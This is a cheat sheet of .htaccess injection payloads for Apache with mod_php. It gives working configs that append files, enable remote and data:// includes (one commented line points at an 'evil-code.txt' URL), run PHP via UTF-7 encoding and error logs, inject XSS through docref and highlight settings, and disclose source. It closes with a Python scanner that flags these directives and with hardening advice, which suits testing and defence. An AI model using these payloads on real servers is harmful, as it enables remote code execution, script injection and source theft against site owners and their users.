PHP htaccess Injection Cheat Sheet

mac, 2024-10-20

Scenario

In an Apache / mod_php setup, an attacker is able to inject a .htaccess file (or a php.ini or Apache configuration file). The directory injected into has AllowOverride Options set (or AllowOverride All, which is also very common).

Examples

Example 1a: File inclusion

index.php: (empty)

.htaccess:

php_value auto_append_file /etc/hosts

Example 1b: PHP code execution

index.php: (empty)

.htaccess:

php_value auto_append_file .htaccess #<?php phpinfo();

Example 1c: (direct/remote) file inclusion

index.php: (empty)

.htaccess:

php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://sektioneins.de/evil-code.txt

Example 1d: XSS and PHP code execution using UTF-7

index.php: (empty)

.htaccess:

php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4
#+ADw?php phpinfo()+ADs

Example 2a: XSS via error message link

index.php: (produces an error message)

<?php include('foo');

.htaccess:

php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "'><script>alert(1);</script>"

Example 2b: XSS via error message link extension

index.php:

<?php include('foo');

.htaccess:

php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "x"
php_value docref_ext "<script>alert(1);</script>"

Example 3a: XSS via phps colours

Assumption: the phps source handler is activated.

<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
Order Allow,Deny
Allow from all
</FilesMatch>

index.phps:

<?php test(); // comment ?> text

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

Example 3b: XSS via highlight_file() colours

index.php:

<?php highlight_file(__FILE__); // comment

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

Example 4a: Failed PHP injection via error_log and include_path

In this example PHP correctly encodes HTML entities in the log message, so the injection fails.

index.php:

<?php include('foo');

.htaccess:

php_value error_log /var/www/ex4a/foo.php
php_value include_path "<?php phpinfo(); __halt_compiler();"

Example 4b: Failed PHP injection via error_log and auto_prepend_file

index.php: (empty)

.htaccess:

php_value error_log /var/www/ipc/ex4b/foo.php
php_value auto_prepend_file "<?php phpinfo(); __halt_compiler();"

Example 4c: PHP code injection via error_log and UTF-7

index.php: (empty)

.htaccess:

php_value error_log /var/www/ipc/ex4c/foo.php
#---- "<?php phpinfo(); __halt_compiler();" in UTF-7:
php_value include_path "+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs"
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"

Example 6: Source code disclosure

index.php:

<?php some_code();

.htaccess:

php_flag engine 0
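Every example above depends on a small set of php_value / php_flag settings, so an .htaccess found in a web root can be triaged for them mechanically. The scanner below is an added example and not part of the original cheat sheet; its RISKY table, regexes and the sample .htaccess are constructed here, and the engine and error_log special cases encode the conditions under which those two settings matter in the examples.

```python
import re

# INI settings the examples above abuse, with the reason they matter. Constructed
# from this cheat sheet; not an exhaustive list of dangerous PHP settings.
RISKY = {
    "auto_append_file": "appends a chosen file to every script (ex. 1a-1d)",
    "auto_prepend_file": "prepends a chosen file to every script (ex. 4b)",
    "allow_url_include": "enables data:// and remote includes (ex. 1c)",
    "zend.multibyte": "prerequisite for zend.script_encoding (ex. 1d, 4c)",
    "zend.script_encoding": "alternate script encoding such as UTF-7 (ex. 1d, 4c)",
    "docref_root": "injected into error-message links (ex. 2a)",
    "docref_ext": "injected into error-message links (ex. 2b)",
    "highlight.comment": "injected into highlighted source output (ex. 3a, 3b)",
    "include_path": "payload carrier echoed in error messages (ex. 4a, 4c)",
    "error_log": "log written to a web-reachable PHP file (ex. 4a-4c)",
    "engine": "turning PHP off discloses source (ex. 6)",
}
OFF = {"", "0", "off", "false", "no"}
DIRECTIVE = re.compile(r"^\s*(php_value|php_flag)\s+(\S+)\s*(.*?)\s*$", re.I)
WEB_SCRIPT = re.compile(r"\.ph(?:p\d?|tml|ps|ar)$", re.I)

def is_risky(setting, value):
    """True when setting=value matches one of the patterns catalogued above."""
    v = value.strip("\"'").lower()
    if setting == "engine":                     # the risk is turning PHP OFF
        return v in OFF
    if setting in ("allow_url_include", "zend.multibyte"):
        return v not in OFF                     # boolean flags: risky when ON
    if setting == "error_log":                  # only when the log is a script
        return bool(WEB_SCRIPT.search(v))
    return setting in RISKY

def scan_htaccess(text):
    """Return (line_no, setting, value, reason) for every risky directive."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if m and is_risky(m.group(2).lower(), m.group(3)):
            setting = m.group(2).lower()
            findings.append((no, setting, m.group(3), RISKY[setting]))
    return findings

# Constructed sample .htaccess mixing harmless directives with ex. 1c/4c-style ones.
SAMPLE = """\
Options -Indexes
php_value upload_max_filesize 8M
php_flag allow_url_include off
php_value auto_append_file .htaccess
php_value error_log /var/www/html/foo.php
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
"""
```

Flagging is only triage: the durable fix is to set these options with php_admin_value / php_admin_flag in the server configuration, which .htaccess cannot override, or to drop AllowOverride Options for directories an attacker can write to.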